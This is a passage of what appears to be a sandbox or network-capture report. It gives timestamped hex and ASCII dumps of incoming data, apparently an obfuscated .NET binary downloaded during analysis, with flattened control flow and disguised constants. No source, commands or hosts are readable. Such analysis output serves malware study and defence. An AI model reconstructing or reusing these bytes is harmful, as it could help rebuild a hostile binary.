00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 Data Ascii: ********************************
2021-09-27 18:36:57 UTC	185	IN	Data Raw: 00 00 38 17 00 00 00 2a 28 f5 04 00 06 20 00 00 00 00 17 3a d5 ff ff ff 26 38 cb ff ff ff 28 16 05 00 06 20 03 00 00 00 38 c0 ff ff ff 28 f6 04 00 06 20 02 00 00 00 17 3a b0 ff ff ff 26 38 a6 ff ff ff 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 c6 00 00 00 01 00 00 11 28 1e 05 00 06 20 04 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 06 00 00 00 42 00 00 00 20 00 00 00 05 00 00 00 43 00 00 00 33 00 00 00 59 00 00 00 38 3d 00 00 00 28 fc 04 00 06 20 05 00 00 00 16 3a ce ff ff ff 26 20 05 00 Data Ascii: 8( :&8( 8( :&8******00*0( 8EB C3Y8=( :&
2021-09-27 18:36:57 UTC	186	IN	Data Raw: 28 06 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0a 1f 11 1f 0b 06 28 06 05 00 06 12 0a 11 0b 11 0c 11 09 1f 0b 1f 16 1f 0c 06 28 06 05 00 06 12 09 11 0a 11 0b 11 0c 1f 0c 1d 1f 0d 06 28 06 05 00 06 12 0c 11 09 11 0a 11 0b 1f 0d 1f 0c 1f 0e 06 28 06 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0e 1f 11 1f 0f 06 28 06 05 00 06 12 0a 11 0b 11 0c 11 09 1f 0f 1f 16 1f 10 06 28 06 05 00 06 12 09 11 0a 11 0b 11 0c 17 1b 1f 11 06 28 07 05 00 06 12 0c 11 09 11 0a 11 0b 1c 1f 09 1f 12 06 28 07 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0b 1f 0e 1f 13 06 28 07 05 00 06 12 0a 11 0b 11 0c 11 09 16 1f 14 1f 14 06 28 07 05 00 06 12 09 11 0a 11 0b 11 0c 1b 1b 1f 15 06 28 07 05 00 06 12 0c 11 09 11 0a 11 0b 1f 0a 1f 09 1f 16 06 28 07 05 00 06 12 0b 11 0c 11 09 11 0a 1f 0f 1f 0e 1f 17 06 28 07 Data Ascii: ((((((((((((((
2021-09-27 18:36:57 UTC	187	IN	Data Raw: 00 04 3a 0b 00 00 00 28 0f 05 00 06 17 80 c3 00 00 04 7e b4 00 00 04 2a 1e 02 28 1a 00 00 0a 2a 13 30 06 00 73 03 00 00 54 00 00 11 05 8e 69 1a 5d 0a 05 8e 69 1a 5b 0b 05 8e 69 8d 2d 00 00 01 0c 03 8e 69 1a 5b 0d 16 13 04 16 13 05 16 13 06 06 16 3e 04 00 00 00 07 17 58 0b 16 13 07 16 13 08 38 2a 03 00 00 11 08 09 5d 13 09 11 08 1a 5a 13 0a 11 09 1a 5a 13 07 03 11 07 19 58 e0 91 1f 18 62 03 11 07 18 58 e0 91 1f 10 62 60 03 11 07 17 58 e0 91 1e 62 60 03 11 07 e0 91 60 13 05 20 ff 00 00 00 13 0b 16 13 0c 11 08 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 32 00 00 00 11 04 11 Data Ascii: :(~(0sTi]i[i-i[>X8*]ZZXbXb`Xb`` Y@I>BX8#>biXY`X?82
2021-09-27 18:36:57 UTC	189	IN	Data Raw: 00 00 f2 09 00 00 e0 0b 00 00 26 0b 00 00 05 00 00 00 4a 00 00 00 21 01 00 00 ef 0b 00 00 0f 0a 00 00 8f 0b 00 00 0d 01 00 00 24 00 00 00 4b 0a 00 00 38 fb 09 00 00 38 e8 09 00 00 20 14 00 00 00 28 76 05 00 06 39 8a ff ff ff 26 20 08 00 00 00 38 7f ff ff ff 11 27 28 4f 05 00 06 39 c2 09 00 00 20 0b 00 00 00 28 75 05 00 06 3a 64 ff ff ff 26 20 01 00 00 00 38 59 ff ff ff 00 11 33 39 4c 00 00 00 20 01 00 00 00 28 76 05 00 06 39 0a 00 00 00 26 38 00 00 00 00 fe 0c 09 00 45 02 00 00 00 26 00 00 00 05 00 00 00 38 21 00 00 00 11 33 28 71 05 00 06 20 00 00 00 00 28 75 05 00 06 39 d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff dd ec 0a 00 00 26 20 00 00 00 00 28 75 05 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 2c 00 45 01 00 00 00 05 00 00 00 38 00 Data Ascii: &J!$K88 (v9& 8'(O9 (u:d& 8Y39L (v9&8E&8!3(q (u9& 8& (u9& 8,E8
2021-09-27 18:36:57 UTC	190	IN	Data Raw: 1a fc ff ff 11 28 1f 22 16 9c 20 13 00 00 00 28 76 05 00 06 39 09 fc ff ff 26 20 07 00 00 00 38 fe fb ff ff 11 33 28 65 05 00 06 20 0b 02 00 00 fe 01 16 fe 01 13 12 20 0b 00 00 00 38 e1 fb ff ff 11 28 1f 20 16 9c 20 29 00 00 00 38 d1 fb ff ff 11 08 11 28 16 20 80 00 00 00 28 66 05 00 06 26 20 24 00 00 00 38 b7 fb ff ff 11 33 28 69 05 00 06 13 35 20 22 00 00 00 38 a4 fb ff ff 11 33 28 69 05 00 06 13 07 20 28 00 00 00 38 91 fb ff ff 11 08 20 86 00 00 00 6a 28 55 05 00 06 20 0a 00 00 00 28 75 05 00 06 3a 75 fb ff ff 26 38 6b fb ff ff 11 08 11 01 11 2b 1f 28 5a 6a 58 1f 10 6a 58 28 55 05 00 06 20 41 00 00 00 28 76 05 00 06 39 4c fb ff ff 26 38 42 fb ff ff 11 32 16 8d 2d 00 00 01 16 16 28 6c 05 00 06 26 20 17 00 00 00 38 2c fb ff ff 11 28 1f 27 16 9c 20 27 00 Data Ascii: (" (v9& 83(e 8( )8( (f& $83(i5 "83(i (8 j(U (u:u&8k+(ZjXjX(U A(v9L&8B2-(l& 8,(' '
2021-09-27 18:36:57 UTC	191	IN	Data Raw: 5b 01 00 00 20 04 00 00 00 28 76 05 00 06 39 ce ff ff ff 26 38 c4 ff ff ff 72 58 01 00 70 28 51 05 00 06 13 24 20 00 00 00 00 28 76 05 00 06 39 ad ff ff ff 26 38 a3 ff ff ff 38 2b 00 00 00 20 02 00 00 00 38 98 ff ff ff 11 27 28 52 05 00 06 39 aa ff ff ff 20 01 00 00 00 28 76 05 00 06 39 7d ff ff ff 26 38 73 ff ff ff dd 88 00 00 00 26 20 00 00 00 00 28 75 05 00 06 3a 0a 00 00 00 26 38 00 00 00 00 fe 0c 17 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd c3 00 00 00 20 03 00 00 00 38 7d f4 ff ff d0 43 00 00 02 28 4d 05 00 06 6f a3 00 00 0a 28 72 05 00 06 28 73 05 00 06 72 62 01 00 70 28 74 05 00 06 73 40 00 00 0a 7a 16 13 2a 20 06 00 00 00 38 47 f4 ff ff 17 28 4c 05 00 06 20 13 00 00 00 28 76 05 00 06 39 32 f4 ff ff 26 38 28 f4 ff ff 16 13 2a 20 10 00 00 00 Data Ascii: [ (v9&8rXp(Q$ (v9&88+ 8'(R9 (v9}&8s& (u:&8E8 8}C(Mo(r(srbp(ts@z* 8G(L (v92&8(*
2021-09-27 18:36:57 UTC	193	IN	Data Raw: d9 05 00 00 89 2c 00 00 66 12 00 00 43 1f 00 00 58 1c 00 00 c2 26 00 00 43 2b 00 00 63 08 00 00 f2 15 00 00 62 1f 00 00 7b 27 00 00 a4 0a 00 00 2f 1b 00 00 a8 25 00 00 ac 1e 00 00 1c 25 00 00 32 21 00 00 19 14 00 00 28 00 00 00 11 16 00 00 f5 04 00 00 f8 18 00 00 ac 19 00 00 8e 23 00 00 ea 0d 00 00 24 28 00 00 bd 15 00 00 e8 02 00 00 68 0c 00 00 fc 01 00 00 db 19 00 00 87 13 00 00 c4 1f 00 00 93 19 00 00 db 27 00 00 75 05 00 00 f3 06 00 00 e0 22 00 00 b2 03 00 00 e9 25 00 00 21 27 00 00 89 2b 00 00 6d 2b 00 00 cc 29 00 00 6a 1b 00 00 5b 1e 00 00 ea 11 00 00 c6 10 00 00 5c 05 00 00 1d 29 00 00 d5 08 00 00 c0 12 00 00 bd 0a 00 00 fe 28 00 00 35 0d 00 00 43 0f 00 00 7d 1a 00 00 ca 1a 00 00 1c 04 00 00 cf 1b 00 00 6c 20 00 00 8d 08 00 00 7d 28 00 00 3c 10 00 Data Ascii: ,fCX&C+cb{'/%%2!(#$(h'u"%!'+m+)j[\)(5C}l }(<
2021-09-27 18:36:57 UTC	194	IN	Data Raw: fe 0e 31 00 20 e2 00 00 00 38 d4 f6 ff ff fe 0c 0a 00 20 1c 00 00 00 20 15 00 00 00 20 10 00 00 00 58 9c 20 f6 00 00 00 38 b5 f6 ff ff fe 0c 0a 00 20 0d 00 00 00 fe 0c 21 00 9c 20 fc 00 00 00 28 75 05 00 06 3a 98 f6 ff ff 26 20 fc 00 00 00 38 8d f6 ff ff fe 0c 25 00 20 0f 00 00 00 20 25 00 00 00 20 54 00 00 00 58 9c 20 46 00 00 00 38 6e f6 ff ff fe 0c 0a 00 20 07 00 00 00 fe 0c 21 00 9c 20 2f 00 00 00 28 76 05 00 06 39 51 f6 ff ff 26 38 47 f6 ff ff fe 0c 25 00 20 0a 00 00 00 fe 0c 31 00 9c 20 0d 01 00 00 38 33 f6 ff ff 11 14 28 54 05 00 06 16 6a 28 55 05 00 06 20 63 00 00 00 28 76 05 00 06 39 16 f6 ff ff 26 38 0c f6 ff ff 20 f7 00 00 00 20 52 00 00 00 59 fe 0e 21 00 20 6a 00 00 00 28 75 05 00 06 3a f2 f5 ff ff 26 38 e8 f5 ff ff fe 0c 0a 00 20 10 00 00 00 Data Ascii: 1 8 X 8 ! (u:& 8% % TX F8n ! /(v9Q&8G% 1 83(Tj(U c(v9&8 RY! j(u:&8
2021-09-27 18:36:57 UTC	195	IN	Data Raw: 00 58 fe 0e 31 00 20 64 00 00 00 38 79 f1 ff ff 11 14 28 63 05 00 06 20 8f 00 00 00 38 68 f1 ff ff fe 0c 0a 00 20 1f 00 00 00 20 99 00 00 00 20 33 00 00 00 59 9c 20 29 00 00 00 38 49 f1 ff ff fe 0c 25 00 20 04 00 00 00 fe 0c 31 00 9c 20 38 00 00 00 28 75 05 00 06 3a 2c f1 ff ff 26 38 22 f1 ff ff fe 0c 0a 00 20 1f 00 00 00 20 63 00 00 00 20 3c 00 00 00 58 9c 20 de 00 00 00 fe 0e 16 00 38 ff f0 ff ff 20 85 00 00 00 20 3f 00 00 00 59 fe 0e 21 00 20 02 00 00 00 38 ea f0 ff ff fe 0c 0a 00 20 12 00 00 00 fe 0c 21 00 9c 20 41 01 00 00 38 d2 f0 ff ff 20 de 00 00 00 20 4a 00 00 00 59 fe 0e 21 00 20 72 00 00 00 38 b9 f0 ff ff fe 0c 25 00 20 00 00 00 00 fe 0c 31 00 9c 20 24 01 00 00 38 a1 f0 ff ff fe 0c 25 00 20 0c 00 00 00 20 f5 00 00 00 20 51 00 00 00 59 9c 20 49 Data Ascii: X1 d8y(c 8h 3Y )8I% 1 8(u:,&8" c <X 8 ?Y! 8 ! A8 JY! r8% 1 $8% QY I
2021-09-27 18:36:57 UTC	196	IN	Data Raw: cd 00 00 00 38 32 ed ff ff 20 8e 00 00 00 20 2f 00 00 00 59 fe 0e 31 00 20 45 00 00 00 38 19 ed ff ff 20 9a 00 00 00 20 33 00 00 00 59 fe 0e 21 00 20 2b 00 00 00 28 76 05 00 06 39 fb ec ff ff 26 38 f1 ec ff ff fe 0c 0a 00 20 0e 00 00 00 20 6e 00 00 00 20 64 00 00 00 59 9c 20 a9 00 00 00 28 76 05 00 06 3a d1 ec ff ff 26 20 b6 00 00 00 38 c6 ec ff ff fe 0c 0a 00 20 19 00 00 00 20 31 00 00 00 20 6e 00 00 00 58 9c 20 a4 00 00 00 38 a7 ec ff ff fe 0c 25 00 20 01 00 00 00 20 77 00 00 00 20 4a 00 00 00 58 9c 20 5f 01 00 00 28 76 05 00 06 39 83 ec ff ff 26 38 79 ec ff ff fe 0c 0a 00 20 0c 00 00 00 20 53 00 00 00 20 4b 00 00 00 59 9c 20 c7 00 00 00 28 75 05 00 06 3a 59 ec ff ff 26 38 4f ec ff ff fe 0c 0a 00 20 07 00 00 00 fe 0c 21 00 9c 20 83 00 00 00 28 76 05 00 Data Ascii: 82 /Y1 E8 3Y! +(v9&8 n dY (v:& 8 1 nX 8% w JX _(v9&8y S KY (u:Y&8O ! (v
2021-09-27 18:36:57 UTC	198	IN	Data Raw: 84 00 00 00 38 d9 e7 ff ff 20 c5 00 00 00 20 6a 00 00 00 59 fe 0e 31 00 20 6f 00 00 00 38 c0 e7 ff ff 20 9c 00 00 00 20 34 00 00 00 59 fe 0e 31 00 20 1d 01 00 00 38 a7 e7 ff ff fe 0c 0a 00 20 1d 00 00 00 fe 0c 21 00 9c 20 c0 00 00 00 38 8f e7 ff ff 20 4b 00 00 00 20 25 00 00 00 58 fe 0e 31 00 20 07 00 00 00 38 76 e7 ff ff fe 0c 25 00 20 05 00 00 00 fe 0c 31 00 9c 20 12 00 00 00 fe 0e 16 00 38 56 e7 ff ff fe 0c 0a 00 20 04 00 00 00 20 7e 00 00 00 20 37 00 00 00 58 9c 20 b2 00 00 00 38 3b e7 ff ff fe 0c 0a 00 20 03 00 00 00 fe 0c 21 00 9c 20 25 00 00 00 28 75 05 00 06 3a 1e e7 ff ff 26 38 14 e7 ff ff fe 0c 0a 00 20 1b 00 00 00 20 ce 00 00 00 20 44 00 00 00 59 9c 20 6d 00 00 00 38 f9 e6 ff ff 20 5b 00 00 00 20 3f 00 00 00 58 fe 0e 21 00 20 4b 01 00 00 38 e0 Data Ascii: 8 jY1 o8 4Y1 8 ! 8 K %X1 8v% 1 8V ~ 7X 8; ! %(u:&8 DY m8 [ ?X! K8
2021-09-27 18:36:57 UTC	199	IN	Data Raw: ff 20 1b 00 00 00 20 5b 00 00 00 58 fe 0e 21 00 20 52 00 00 00 28 76 05 00 06 39 6a e2 ff ff 26 38 60 e2 ff ff 20 ae 00 00 00 20 3a 00 00 00 59 fe 0e 21 00 20 50 00 00 00 28 75 05 00 06 3a 46 e2 ff ff 26 38 3c e2 ff ff 20 f3 00 00 00 20 51 00 00 00 59 fe 0e 31 00 20 39 01 00 00 38 27 e2 ff ff fe 0c 0a 00 20 03 00 00 00 20 a8 00 00 00 20 38 00 00 00 59 9c 20 48 01 00 00 38 08 e2 ff ff fe 0c 0a 00 20 0f 00 00 00 fe 0c 21 00 9c 20 87 00 00 00 38 f0 e1 ff ff fe 0c 0a 00 20 1c 00 00 00 fe 0c 21 00 9c 20 ac 00 00 00 28 76 05 00 06 39 d3 e1 ff ff 26 38 c9 e1 ff ff fe 0c 0a 00 20 1e 00 00 00 20 ee 00 00 00 20 4f 00 00 00 59 9c 20 64 01 00 00 38 ae e1 ff ff fe 0c 25 00 20 0b 00 00 00 fe 0c 31 00 9c 20 23 00 00 00 28 76 05 00 06 39 91 e1 ff ff 26 38 87 e1 ff ff fe Data Ascii: [X! R(v9j&8` :Y! P(u:F&8< QY1 98' 8Y H8 ! 8 ! (v9&8 OY d8% 1 #(v9&8
2021-09-27 18:36:57 UTC	200	IN	Data Raw: ff ff 7e b9 00 00 04 28 5e 05 00 06 11 20 28 5f 05 00 06 28 60 05 00 06 28 61 05 00 06 20 bf 00 00 00 28 76 05 00 06 39 04 dd ff ff 26 38 fa dc ff ff 20 76 00 00 00 20 52 00 00 00 58 fe 0e 21 00 20 41 00 00 00 38 e5 dc ff ff fe 0c 25 00 20 03 00 00 00 fe 0c 31 00 9c 20 7c 00 00 00 28 75 05 00 06 3a c8 dc ff ff 26 20 11 00 00 00 38 bd dc ff ff fe 0c 0a 00 20 1e 00 00 00 20 44 00 00 00 20 1f 00 00 00 58 9c 20 45 01 00 00 fe 0e 16 00 38 96 dc ff ff fe 0c 25 00 20 09 00 00 00 fe 0c 31 00 9c 20 74 00 00 00 28 76 05 00 06 39 7d dc ff ff 26 38 73 dc ff ff fe 0c 0a 00 20 1a 00 00 00 20 81 00 00 00 20 2b 00 00 00 59 9c 20 1a 00 00 00 28 75 05 00 06 39 53 dc ff ff 26 20 36 00 00 00 38 48 dc ff ff fe 0c 0a 00 20 17 00 00 00 fe 0c 21 00 9c 20 04 01 00 00 28 76 05 00 Data Ascii: ~(^ (_(`(a (v9&8 v RX! A8% 1 \|(u:& 8 D X E8% 1 t(v9}&8s +Y (u9S& 68H ! (v
2021-09-27 18:36:57 UTC	202	IN	Data Raw: fe 0c 21 00 9c 20 31 00 00 00 38 c8 d7 ff ff fe 0c 25 00 20 09 00 00 00 fe 0c 31 00 9c 20 3e 01 00 00 38 b0 d7 ff ff 20 98 00 00 00 20 32 00 00 00 59 fe 0e 31 00 20 15 01 00 00 28 75 05 00 06 3a 92 d7 ff ff 26 20 58 00 00 00 38 87 d7 ff ff fe 0c 25 00 20 00 00 00 00 fe 0c 31 00 9c 20 30 01 00 00 38 6f d7 ff ff 20 46 00 00 00 20 13 00 00 00 59 fe 0e 21 00 20 3b 00 00 00 28 76 05 00 06 3a 51 d7 ff ff 26 20 89 00 00 00 38 46 d7 ff ff 20 fa 00 00 00 20 53 00 00 00 59 fe 0e 31 00 20 43 01 00 00 28 75 05 00 06 3a 28 d7 ff ff 26 20 fc 00 00 00 38 1d d7 ff ff fe 0c 0a 00 20 0a 00 00 00 fe 0c 21 00 9c 20 3b 00 00 00 28 75 05 00 06 39 00 d7 ff ff 26 20 c4 00 00 00 38 f5 d6 ff ff fe 0c 25 00 20 02 00 00 00 fe 0c 31 00 9c 20 2e 01 00 00 fe 0e 16 00 38 d5 d6 ff ff fe Data Ascii: ! 18% 1 >8 2Y1 (u:& X8% 1 08o F Y! ;(v:Q& 8F SY1 C(u:(& 8 ! ;(u9& 8% 1 .8
2021-09-27 18:36:57 UTC	203	IN	Data Raw: 20 73 00 00 00 59 9c 20 88 00 00 00 28 76 05 00 06 39 68 d2 ff ff 26 38 5e d2 ff ff fe 0c 25 00 20 07 00 00 00 20 53 00 00 00 20 04 00 00 00 58 9c 20 34 01 00 00 38 43 d2 ff ff fe 0c 0a 00 20 19 00 00 00 fe 0c 21 00 9c 20 af 00 00 00 38 2b d2 ff ff 20 ee 00 00 00 20 4f 00 00 00 59 fe 0e 31 00 20 aa 00 00 00 28 75 05 00 06 39 0d d2 ff ff 26 20 51 01 00 00 38 02 d2 ff ff fe 0c 25 00 20 0e 00 00 00 fe 0c 31 00 9c 20 3d 01 00 00 38 ea d1 ff ff fe 0c 25 00 20 03 00 00 00 20 7c 00 00 00 20 36 00 00 00 58 9c 20 ea 00 00 00 28 76 05 00 06 39 c6 d1 ff ff 26 20 62 00 00 00 38 bb d1 ff ff fe 0c 25 00 20 06 00 00 00 20 7a 00 00 00 20 29 00 00 00 58 9c 20 c3 00 00 00 28 76 05 00 06 39 97 d1 ff ff 26 20 39 00 00 00 38 8c d1 ff ff fe 0c 0a 00 20 1d 00 00 00 fe 0c 21 00 Data Ascii: sY (v9h&8^% S X 48C ! 8+ OY1 (u9& Q8% 1 =8% \| 6X (v9& b8% z )X (v9& 98 !
2021-09-27 18:36:57 UTC	204	IN	Data Raw: 00 00 38 00 00 00 00 17 13 2a 20 00 00 00 00 28 75 05 00 06 39 dc ff ff ff 26 20 01 00 00 00 38 d1 ff ff ff dd 93 cc ff ff 20 09 00 00 00 38 81 c0 ff ff 00 00 00 41 64 00 00 00 00 00 00 bb 0a 00 00 a3 00 00 00 5e 0b 00 00 2d 00 00 00 16 00 00 01 00 00 00 00 5f 0c 00 00 da 32 00 00 39 3f 00 00 4e 00 00 00 16 00 00 01 00 00 00 00 9e 01 00 00 60 08 00 00 fe 09 00 00 4e 00 00 00 16 00 00 01 00 00 00 00 ba 00 00 00 58 00 00 00 12 01 00 00 32 00 00 00 16 00 00 01 1b 30 06 00 40 06 00 00 58 00 00 11 02 28 a2 00 00 0a 0a 7e cf 00 00 04 3a 06 04 00 00 16 13 17 7e bf 00 00 04 25 13 26 12 17 28 bb 00 00 0a 73 bc 00 00 0a 0b 20 43 00 00 02 28 23 06 00 06 28 a2 00 00 0a 6f a3 00 00 0a 72 ca 01 00 70 6f bd 00 00 0a 73 3b 00 00 0a 0c 08 6f b5 00 00 0a 16 6a 6f b6 00 00 Data Ascii: 8* (u9& 8 8Ad^-_29?N`NX20@X(~:~%&(s C(#(orpos;ojo
2021-09-27 18:36:57 UTC	206	IN	Data Raw: 01 00 00 11 1e 6f cd 00 00 0a 13 1f 11 1f 8e 69 17 58 13 20 11 20 8d 1e 00 00 01 13 21 11 1e 6f ce 00 00 0a 6f cf 00 00 0a 39 15 00 00 00 11 21 16 11 1e 6f ce 00 00 0a 6f d0 00 00 0a a2 38 13 00 00 00 11 21 16 20 16 00 00 01 28 23 06 00 06 28 a2 00 00 0a a2 16 13 22 38 17 00 00 00 11 21 11 22 17 58 11 1f 11 22 9a 6f d1 00 00 0a a2 11 22 17 58 13 22 11 22 11 1f 8e 69 3f de ff ff ff 7e 62 00 00 0a 11 1e 6f d2 00 00 0a 11 21 06 17 73 7e 00 00 0a 13 23 11 23 6f d3 00 00 0a 13 24 16 13 25 38 78 00 00 00 11 25 13 27 11 27 45 04 00 00 00 05 00 00 00 16 00 00 00 27 00 00 00 38 00 00 00 38 44 00 00 00 11 24 7e 6a 00 00 0a 6f d4 00 00 0a 38 41 00 00 00 11 24 7e 6d 00 00 0a 6f d4 00 00 0a 38 30 00 00 00 11 24 7e 93 00 00 0a 6f d4 00 00 0a 38 1f 00 00 00 11 24 7e d5 Data Ascii: oiX !oo9!oo8! (#("8!"X"o"X""i?~bo!s~##o$%8x%''E'88D$~jo8A$~mo80$~o8$~
2021-09-27 18:36:57 UTC	207	IN	Data Raw: 01 a2 07 17 03 a2 07 6f 9b 00 00 0a 74 73 00 00 01 2a 00 00 1b 30 08 00 06 64 00 00 5e 00 00 11 20 24 00 00 00 fe 0e 21 00 38 00 00 00 00 fe 0c 21 00 45 ac 02 00 00 23 33 00 00 b3 06 00 00 e2 1b 00 00 fa 45 00 00 93 26 00 00 23 1d 00 00 86 0d 00 00 f5 0f 00 00 cf 53 00 00 e3 28 00 00 60 05 00 00 08 20 00 00 9e 02 00 00 b5 50 00 00 a7 51 00 00 24 28 00 00 5a 37 00 00 17 3d 00 00 2e 04 00 00 ae 53 00 00 73 1e 00 00 0c 3c 00 00 3a 26 00 00 70 06 00 00 3c 3b 00 00 da 24 00 00 2d 10 00 00 c0 00 00 00 fc 2e 00 00 56 10 00 00 04 56 00 00 df 4c 00 00 8c 1e 00 00 cc 47 00 00 1b 0a 00 00 a6 10 00 00 41 04 00 00 0f 37 00 00 a3 54 00 00 27 37 00 00 72 37 00 00 ac 18 00 00 24 24 00 00 69 3e 00 00 26 13 00 00 cf 1d 00 00 74 15 00 00 47 3c 00 00 69 56 00 00 ba 11 00 00 Data Ascii: ots*0d^ $!8!E#3E&#S(` PQ$(Z7=.Ss<:&p<;$-.VVLGA7T'7r7$$i>&tG<iV
2021-09-27 18:36:57 UTC	209	IN	Data Raw: 00 00 6f 16 00 00 07 3e 00 00 31 0e 00 00 28 06 00 00 99 42 00 00 18 44 00 00 a2 06 00 00 38 3d 00 00 d1 17 00 00 e9 11 00 00 9a 07 00 00 0c 1a 00 00 75 2e 00 00 a2 3e 00 00 a9 01 00 00 3b 4a 00 00 c9 3a 00 00 a0 50 00 00 94 03 00 00 ea 50 00 00 5e 31 00 00 be 05 00 00 83 45 00 00 0a 1f 00 00 e2 15 00 00 e5 21 00 00 74 42 00 00 9b 12 00 00 c7 3d 00 00 9c 36 00 00 a0 44 00 00 5c 07 00 00 24 00 00 00 87 13 00 00 60 1d 00 00 eb 13 00 00 af 13 00 00 67 38 00 00 17 08 00 00 9d 05 00 00 f5 14 00 00 b0 3a 00 00 5c 08 00 00 d8 51 00 00 ad 03 00 00 e7 42 00 00 f2 4d 00 00 e9 0e 00 00 4b 47 00 00 73 47 00 00 ea 24 00 00 1b 1c 00 00 cf 0a 00 00 19 14 00 00 71 55 00 00 54 4c 00 00 c1 3e 00 00 4c 27 00 00 1d 3b 00 00 77 28 00 00 c3 06 00 00 b3 44 00 00 ff 27 00 00 34 Data Ascii: o>1(BD8=u.>;J:PP^1E!tB=6D\$`g8:\QBMKGsG$qUTL>L';w(D'4
2021-09-27 18:36:57 UTC	210	IN	Data Raw: 00 cf 0d 00 00 04 55 00 00 7c 3c 00 00 7f 1d 00 00 be 13 00 00 10 05 00 00 c7 4c 00 00 4c 12 00 00 41 46 00 00 85 04 00 00 e3 06 00 00 6d 00 00 00 47 18 00 00 38 1e 33 00 00 fe 0c 04 00 20 0d 00 00 00 20 a2 00 00 00 20 36 00 00 00 59 9c 20 45 02 00 00 38 27 f5 ff ff 14 13 1b 20 f5 00 00 00 38 1a f5 ff ff 7e ce 00 00 04 28 c3 05 00 06 28 cc 05 00 06 28 cd 05 00 06 20 70 02 00 00 38 fc f4 ff ff 11 4e 11 0d 11 28 58 11 45 11 4f 5f 11 6e 1f 1f 5f 64 d2 9c 20 3e 02 00 00 38 de f4 ff ff fe 0c 04 00 20 04 00 00 00 fe 0c 79 00 9c 20 25 01 00 00 38 c6 f4 ff ff fe 0c 04 00 20 0e 00 00 00 20 3e 00 00 00 20 7b 00 00 00 58 9c 20 58 02 00 00 fe 0e 21 00 38 9f f4 ff ff fe 0c 0a 00 20 0d 00 00 00 fe 0c 00 00 9c 20 8b 00 00 00 38 8b f4 ff ff fe 0c 04 00 20 0f 00 00 00 fe Data Ascii: U\|<LLAFmG83 6Y E8' 8~((( p8N(XEO_n_d >8 y %8 > {X X!8 8
2021-09-27 18:36:57 UTC	211	IN	Data Raw: 23 f0 ff ff 26 38 19 f0 ff ff 11 66 11 72 16 11 72 8e 69 28 aa 05 00 06 20 44 02 00 00 38 05 f0 ff ff 28 86 05 00 06 20 51 00 00 00 28 d1 05 00 06 3a f1 ef ff ff 26 38 e7 ef ff ff fe 0c 0a 00 20 12 00 00 00 20 08 00 00 00 20 13 00 00 00 58 9c 20 0f 01 00 00 28 d2 05 00 06 39 c7 ef ff ff 26 38 bd ef ff ff 11 3c 11 2e 3f b6 0f 00 00 20 57 01 00 00 38 ae ef ff ff 7e da 00 00 04 28 a2 05 00 06 16 9a 28 a3 05 00 06 13 73 20 98 01 00 00 fe 0e 21 00 38 89 ef ff ff 20 ee 00 00 00 20 4f 00 00 00 59 fe 0e 00 00 20 50 02 00 00 38 74 ef ff ff 16 13 58 20 4c 02 00 00 28 d1 05 00 06 3a 62 ef ff ff 26 38 58 ef ff ff 38 b3 10 00 00 20 96 02 00 00 28 d2 05 00 06 39 48 ef ff ff 26 38 3e ef ff ff fe 0c 04 00 20 0c 00 00 00 20 d8 00 00 00 20 48 00 00 00 59 9c 20 7e 02 00 00 Data Ascii: #&8frri( D8( Q(:&8 X (9&8<.? W8~((s !8 OY P8tX L(:b&8X8 (9H&8> HY ~
2021-09-27 18:36:57 UTC	213	IN	Data Raw: 91 1f 18 62 11 03 11 06 18 58 e0 91 1f 10 62 60 11 03 11 06 17 58 e0 91 1e 62 60 11 03 11 06 e0 91 60 13 68 20 b4 01 00 00 28 d2 05 00 06 39 9b ea ff ff 26 38 91 ea ff ff 20 2b 00 00 00 20 40 00 00 00 58 fe 0e 00 00 20 a5 02 00 00 38 7c ea ff ff 11 23 17 58 13 23 20 2f 01 00 00 38 6c ea ff ff 12 74 e0 73 f3 00 00 0a 16 16 28 7c 05 00 06 20 bd 01 00 00 38 53 ea ff ff 20 b9 00 00 00 20 3d 00 00 00 59 fe 0e 00 00 20 41 01 00 00 38 3a ea ff ff fe 0c 0a 00 20 06 00 00 00 20 40 00 00 00 20 31 00 00 00 58 9c 20 76 00 00 00 28 d1 05 00 06 3a 16 ea ff ff 26 38 0c ea ff ff fe 0c 0a 00 20 19 00 00 00 20 8e 00 00 00 20 2f 00 00 00 59 9c 20 e6 00 00 00 38 f1 e9 ff ff 2a 20 87 00 00 00 20 2d 00 00 00 59 fe 0e 00 00 20 49 00 00 00 28 d1 05 00 06 3a d2 e9 ff ff 26 38 c8 Data Ascii: bXb`Xb``h (9&8 + @X 8\|#X# /8lts(\| 8S =Y A8: @ 1X v(:&8 /Y 8* -Y I(:&8
